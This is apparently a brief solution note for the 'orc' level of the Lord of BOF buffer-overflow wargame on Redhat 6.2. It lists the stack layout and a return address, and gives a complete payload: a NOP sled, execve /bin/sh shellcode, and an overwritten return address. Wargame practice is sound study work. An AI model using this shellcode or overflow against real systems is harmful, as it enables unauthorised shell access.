Wargames/Load Of BOF
LOB Redhat 6.2 - orc
5unKn0wn
2015. 10. 24. 00:04
orc - egghunter + buffer hunter
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffc44
Payload : ./wolfman `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x44\xfc\xff\xbf"'`
Using argv[1] address